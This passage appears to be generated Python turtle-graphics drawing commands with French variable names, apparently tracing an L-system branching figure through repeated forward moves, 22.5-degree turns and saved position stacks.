pd(), fd(8.0) ;
pu(), setposition((89.98,217.23)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((89.98,217.23), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,217.23)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((101.29,228.54), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,228.54)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((101.29,228.54), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,228.54)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((116.08,234.67), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,234.67)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((83.86,202.45), 45.0), ((116.08,234.67), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,234.67)), setheading(22.5) ;
pu(), setposition((83.86,202.45)), setheading(45.0) ;
pu(), setposition((48.98,118.26)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((63.77,124.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,124.38)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((93.33,124.38), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,124.38)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((109.33,124.38), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.33,124.38)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 0.0), ((124.11,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((124.11,130.50)), setheading(22.5) ;
pu(), setposition((78.55,130.50)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((89.86,141.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.86,141.82)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((104.64,147.94), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((104.64,147.94)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((78.55,130.50), 22.5), ((120.64,147.94), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((120.64,147.94)), setheading(0.0) ;
pu(), setposition((78.55,130.50)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((93.33,136.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,136.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((93.33,136.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((93.33,136.63)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.11,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((108.11,142.75)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((138.89,136.63), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.89,136.63)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((138.89,136.63), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((138.89,136.63)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,142.75)), setheading(22.5) ;
pu(), setposition((108.11,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((119.43,154.06), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((119.43,154.06)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((134.21,160.18), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.21,160.18)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((134.21,160.18), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((134.21,160.18)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((150.21,160.18), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.21,160.18)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 22.5), ((150.21,160.18), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((150.21,160.18)), setheading(0.0) ;
pu(), setposition((108.11,142.75)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((122.89,136.63), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((122.89,136.63)), setheading(337.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.68,130.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((137.68,130.50)), setheading(337.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((143.80,115.72), 270.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.80,115.72)), setheading(270.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((143.80,115.72), 292.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((143.80,115.72)), setheading(292.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((155.11,104.41), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.11,104.41)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((155.11,104.41), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((155.11,104.41)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((169.89,98.28), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.89,98.28)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 315.0), ((169.89,98.28), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.89,98.28)), setheading(337.5) ;
pu(), setposition((137.68,130.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((153.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((153.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((168.46,124.38), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.46,124.38)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((168.46,124.38), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((168.46,124.38)), setheading(337.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((179.77,113.07), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((179.77,113.07)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((137.68,130.50), 337.5), ((179.77,113.07), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((179.77,113.07)), setheading(315.0) ;
pu(), setposition((137.68,130.50)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((153.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((153.68,130.50)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.68,130.50)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((180.99,119.19), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.99,119.19)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((180.99,119.19), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.99,119.19)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((195.77,113.07), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.77,113.07)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((195.77,113.07), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.77,113.07)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((211.77,113.07), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.77,113.07)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 337.5), ((211.77,113.07), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.77,113.07)), setheading(0.0) ;
pu(), setposition((169.68,130.50)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((184.46,136.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((184.46,136.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((200.46,136.63), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.46,136.63)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((200.46,136.63), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.46,136.63)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((215.24,130.50), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((215.24,130.50)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((169.68,130.50), 0.0), ((215.24,130.50), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((215.24,130.50)), setheading(337.5) ;
pu(), setposition((169.68,130.50)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((184.46,136.63), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((184.46,136.63), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.46,136.63)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((199.24,142.75)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((199.24,142.75)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((214.02,136.63), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.02,136.63)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((214.02,136.63), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.02,136.63)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((230.02,136.63), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.02,136.63)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((230.02,136.63), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.02,136.63)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((108.11,142.75), 0.0), ((199.24,142.75), 0.0), ((244.80,142.75), 0.0)] ;
